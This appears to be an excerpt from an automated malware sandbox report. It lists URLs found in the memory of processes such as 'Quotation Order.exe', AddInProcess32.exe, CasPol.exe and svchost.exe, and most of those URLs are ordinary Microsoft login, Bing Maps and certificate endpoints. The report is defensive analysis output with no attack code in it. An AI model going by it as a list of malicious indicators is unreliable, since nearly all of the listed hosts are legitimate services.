                    Source: svchost.exe, 00000024.00000002.2517880244.000002B805791000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515299531.000002B804E73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517472650.000002B80575F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2518883672.000002B805C9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1425939517.000002B80578D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517123888.000002B805713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: svchost.exe, 00000024.00000003.1360706982.000002B805729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1390230532.000002B80572F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1380858399.000002B805729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1390230532.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: svchost.exe, 00000024.00000002.2518501231.000002B805C59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: svchost.exe, 00000024.00000002.2517675071.000002B80576F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1434712094.000002B80576E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue1
                    Source: svchost.exe, 00000024.00000002.2517675071.000002B80576F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1434712094.000002B80576E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: svchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustnce
                    Source: Quotation Order.exe, 00000000.00000002.1287260691.000002598039A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.000000000325C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: svchost.exe, 00000008.00000002.2513040274.0000029957118000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2511975756.0000029956887000.00000004.00000020.00020000.00000000.sdmp, regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.8.drString found in binary or memory: http://standards.iso.org/iso/19770/-2/2009/schema.xsd
                    Source: Amcache.hve.35.drString found in binary or memory: http://upx.sf.net
                    Source: svchost.exe, 00000003.00000002.1365924349.00000215E6C13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                    Source: AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co4
                    Source: AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005F80000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1622449138.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2543008151.0000000006260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005F80000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1622449138.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2543008151.0000000006260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: svchost.exe, 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                    Source: svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                    Source: svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359102832.000002B805757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwamvice
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366155272.00000215E6C59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                    Source: svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                    Source: svchost.exe, 00000003.00000003.1363757483.00000215E6C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366478054.00000215E6C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                    Source: svchost.exe, 00000003.00000003.1362941126.00000215E6C74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366539238.00000215E6C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1363814571.00000215E6C62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1364259093.00000215E6C5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                    Source: svchost.exe, 00000003.00000003.1363757483.00000215E6C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1365960193.00000215E6C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366478054.00000215E6C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                    Source: svchost.exe, 00000003.00000002.1366055215.00000215E6C3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1363814571.00000215E6C62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                    Source: svchost.exe, 00000003.00000002.1366055215.00000215E6C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000003.00000003.1363814571.00000215E6C62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                    Source: svchost.exe, 00000003.00000003.1364293174.00000215E6C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000003.00000002.1366055215.00000215E6C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000003.00000003.1363814571.00000215E6C62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000003.00000002.1366086819.00000215E6C44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1364324633.00000215E6C43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000003.00000002.1366539238.00000215E6C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                    Source: svchost.exe, 00000003.00000003.1362821532.00000215E6C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
                    Source: svchost.exe, 00000003.00000003.1363757483.00000215E6C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1365960193.00000215E6C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366478054.00000215E6C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000024.00000002.2516513363.000002B804F13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2519109221.000002B805CB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: svchost.exe, 00000024.00000002.2518170013.000002B805C13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                    Source: svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfe.com
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                    Source: svchost.exe, 00000024.00000003.1390016964.000002B804EE4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515392408.000002B804E81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2518233779.000002B805C37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2516290801.000002B804EE1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                    Source: svchost.exe, 00000024.00000002.2516290801.000002B804EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf$V
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srfo.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srfIssuerP
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srftificates
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
